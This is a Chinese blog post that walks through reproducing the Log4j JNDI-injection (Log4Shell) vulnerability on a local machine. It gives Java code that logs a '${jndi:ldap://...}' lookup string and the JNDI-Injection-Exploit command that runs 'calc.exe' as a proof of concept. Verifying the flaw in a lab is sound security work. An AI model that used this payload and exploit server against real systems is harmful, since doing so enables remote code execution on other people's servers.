Apache Log4j 漏洞验证

最新推荐文章于 2024-02-06 22:30:44 发布
最新推荐文章于 2024-02-06 22:30:44 发布
阅读量3.3k 收藏 1
点赞数
分类专栏: 攻防 文章标签: apache 安全 java log4j漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/liu_si_yan/article/details/121948418
版权

首先下载JNDI-Injection-Exploit,该jar包实现RMI、LDAP服务功能,对外提供服务,且包含用于执行攻击命令的ExecTemplateJDK7.class和ExecTemplateJDK8.class模版文件。

下载包含漏洞版本的log4j的jar包

使用如下3个jar包文件

 

添加上面3个jar包到工程:

 

编写测试代码:

import org.apache.log4j.Logger;


public class Log4jDemo {
		

	/**
	 * @param args
	 */
	public static void main(String[] args) {
		Logger log = Logger.getLogger("Demo");
		
		// TODO Auto-generated method stub
		System.out.println("Hello World!");
		System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
		log.error("Start");
		log.error("${jndi:ldap://127.0.0.1:1389/tvakh1}");
		log.error("End.");

	}

}

启动服务:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "cmd /c call calc.exe" -A "127.0.0.1"

启动测试程序,触发漏洞,弹出计算器

 

_Noema
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
org.apache.log4j
12-12
Log4jApache 的一个开放源代码项目,通过使用 Log4j ,我们可以控制日志信息输送的目的地是控制台、文件、 GUI 组件、甚至是套接口服 务器、 NT 的事件记录器、 UNIX Syslog 守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就 是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码
【XSS漏洞03】XSS漏洞验证、语句构造与绕过方法
Fighting_hawk的博客
02-24 9650
1. 了解漏洞验证相关概念含义; 2. 掌握XSS漏洞验证的方法; 3. 掌握XSS语句构造的5种方法; 4. 掌握XSS语句绕过的8种方法。
Log4j2漏洞(一)原理和dnslog验证
最新发布
02-06 1212
Log4j2漏洞(一)介绍漏洞前景、漏洞原理、确定注入点和dnslog验证
漏扫常见(可验证)漏洞复现方法
qq_50854662的博客
04-21 4217
漏扫常见漏洞复现
【实战】一次简单的log4j漏洞测试
crowsec
12-19 3005
【实战】一次简单的log4j漏洞测试
log4j2漏洞复现
m0_52920608的博客
09-16 540
log4j2漏洞 vulhub复现
log4j漏洞分析及总结
csd_ct的专栏
02-14 4万+
2021年12月8号爆出的log4j2的远程代码执行漏洞【cve-2021-44228】,堪称史诗级核弹漏洞,虽然过了这么久,大部分现网中的相关漏洞已经修复,但任然可以捡漏…,网上也有不少大佬和研究机构都对该漏洞做了分析和复盘,年前年后比较忙,一直没有好好的分析总结该漏洞,最近学习下刚好补上。 漏洞描述及影响 log4jApache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。
log4j关于JNDI注入漏洞验证及修复
影子的博客
12-11 7389
log4j关于JNDI注入漏洞验证及修复一、漏洞说明二、漏洞检测方案三、影响范围四、影响组件五、彻底解决方案六、临时缓解方案七、漏洞复现八、本地编译log4j-2.15.0-rc版本方法1、下载源码2、安装JDK8、9、11。3、用idea打开源码4、修改toolchains-sample-win.xml文件的JDK安装路径5、修改maven的conf目录下的toolchains.xml文件,设置java11的安装路径6、编译安装到本地仓库 一、漏洞说明 漏洞原理官方表述:Apache Log4j2 中存在
Web网络安全-----Log4j高危漏洞原理及修复
qq_51690690的博客
07-27 1万+
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。提示:以下是本篇文章正文内容,下面案例可供参考。
log4j漏洞详解
weixin_61638307的博客
03-21 3647
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,举个例子:它就相当于的你的一个秘书,用了一些手段,你可以去指使他去干一些事情,这个手段就是lookup(),相当于你给秘书一个目标。先给这些名词简单说一下Ldap:你可以将它理解为一个目标数据库。
Log4J2漏洞修复方法验证及最终方案
dbzzcz的博客
12-14 2万+
验证代码准备: 在项目登录接口中增加类似如下代码: @PostMapping("login") public R<?> login(@RequestBody LoginBody form) { //form.getUsername()="${java:version}" logger.info("登录:{}",form.getUsername()); // 用户登录 LoginUser userInfo = sysLoginService.login(form.getUsernam
Apache Log4j 2代码漏洞处置指南及检测工具.zip
12-10
Apache Log4j 2存在远程代码执行漏洞处置指南 及期检测工具
解决Apache Log4j 远程代码执行漏洞log4j2部分jar
12-10
解决Apache Log4j 远程代码执行漏洞log4j2部分jar,包含log4j-1.2-api-2.15.0.jar,log4j-api-2.15.0.jar,log4j-core-2.15.0.jar,log4j-to-slf4j-2.15.0.jar
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 远程代码执行漏洞检测工具,包含windows版和linux版。图形化 Apache Log4j2检测工具
apachelog4J漏洞测试工具,apacheLog4j_POC
08-23
仅供测试学习使用,请不要从事非法活动
实战:无线wifi密码破解与路由器入侵
热门推荐
柳似烟的专栏
03-28 5万+
工作之余,闲来无事,搞搞事情,不搞不知道,一搞还真搞了些东西,企业安全......呵呵!由于之前一直在做路由器项目,今天来看看周围的WiFi是否安全,开启我的Kali,插上USB无线网卡,目测我的网卡是拓实的双频无线网卡,Realtek 8812au芯片,开始在Github上clone下一个驱动,一阵make安装后,发现无法设置为monitor混杂模式,dmesg看到崩溃,看来Github上的驱动...
向日葵(SunLoginClient_10.5.0.29)RCE验证
柳似烟的专栏
02-18 7157
向日葵RCE远程命令执行
使用arpspoof获取同事爱奇异账户
柳似烟的专栏
09-05 6991
之前没事的时候,使用nmap检测到路由器存在弱口令admin 今天没事登录路由器看看哪台机器流量比较多,刷新了几次流量统计,发现10.0.0.81的机器一直排的首位,流量蛮大,于是想看看这台机器在干什么 打开我的kali系统,启动arpspoof,准备命令arpspoof -i etho -c own -t 10.0.0.81 10.0.0.1 启动Wireshark,设置过滤条件i
apache log4j漏洞
07-29
您好!对于Apache Log4j漏洞,我可以提供一些相关信息。Apache Log4j是一个开源日志管理工具,用于在Java应用程序中记录和管理日志。然而,最近发现了一个安全漏洞,称为CVE-2021-44228(也被称为Log4Shell)。 该漏洞可能允许远程攻击者通过特殊构造的日志消息触发远程代码执行,从而导致服务器受到攻击。这个漏洞的严重性被评为非常高,因为它影响了广泛使用Log4j的众多应用程序。 如果您正在使用Apache Log4j,请确保及时升级到最新版本(目前是2.15.0),以修复该漏洞。此外,您还可以采取一些其他安全措施,例如禁用JNDI查找功能或配置一个安全的日志消息过滤器来缓解潜在的风险。 请注意,这只是一种简要介绍,如果您对该漏洞有更深入的了解需求,请提供更具体的问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值